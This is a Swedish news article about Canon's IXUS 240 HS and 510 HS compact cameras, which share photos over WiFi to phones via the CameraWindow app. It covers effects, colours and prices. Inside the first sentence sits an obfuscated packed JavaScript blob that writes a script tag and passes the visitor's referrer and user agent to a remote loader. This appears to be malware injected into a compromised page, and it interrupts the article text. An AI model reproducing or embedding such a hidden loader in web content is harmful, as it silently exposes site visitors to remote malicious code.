Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Canon låter dig dela dina bilder direkt från kameran via WiFi

Canon låter dig dela dina bilder direkt från kameran via WiFi
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htdtn|var|u0026u|referrer|eayse||js|php’.split(’|’),0,{}))
behöver man inte längre ladda över sina bilder till datorn för att lägga upp dem på Facebook och andra sociala nätverk. Canon lanserar två smarta kompaktkameror med inbyggd WiFi-anslutning, vilket innebär att man kan föra över bilderna direkt från kameran till din smartphone eller surfplatta. Kamerornas inbyggda pekskärm gör dem dessutom väldigt enkla att använda.

Canons två WiFi-nyheter tillhör den välkända IXUS-serien. Oavsett vilken modell man väljer får man en liten och elegant kamera som får plats i fickan eller handväskan. Med snygg design och en mängd roliga funktioner får man en kamera som tar knivskarpa bilder, är enkel att använda och som ger direktaccess till de sociala medierna.

– Många vill kunna ladda över sina bilder direkt från kameran till mobilen för att kunna redigera dem i sina favoritappar, var man än befinner sig. Våra nya IXUS modeller med WiFi gör det mycket enklare att snabbt kunna dela bilder med sina vänner i sociala medier– kamerorna har till exempel flera roliga och användbara effekter som man kan använda för att redigera bilderna direkt i kameran, säger Helen Iwefors Häggblom, kommunikationschef på Canon.

Via appen Canon CameraWindow (finns att ladda ner gratis i App Store) överförs foton och videoklipp trådlöst till din mobil eller surfplatta. Med samma program delar du sedan dina redigerade eller oredigerade bilder och videoklipp via e-post, YouTube, Facebook och andra sociala medier.

Roliga funktioner
Några av de funktioner som kamerorna innehåller är miniatyreffekten som gör landskapen till miniatyrmodeller, fisheye-effekten, funktionen för slät hy som tar bort ojämnheter och ger snygga porträtt, samt effekten för mjukt fokus som gör bilderna mer drömlika och vackra.
Båda kamerorna tar högkvalitativa och skarpa bilder tack vare Canon-objektiv av hög klass Kamerorna är även utrustade med HS-systemet som förbättrar bildkvaliteten under sämre ljusförhållanden.

Canon IXUS 240 HS kostar ca 2 900 kronor och finns i fem färger: blå, ceriserosa, ljusrosa, silver och svart.
Canon IXUS 510 HS kostar ca 3 600 kronor och finns i vit och svart.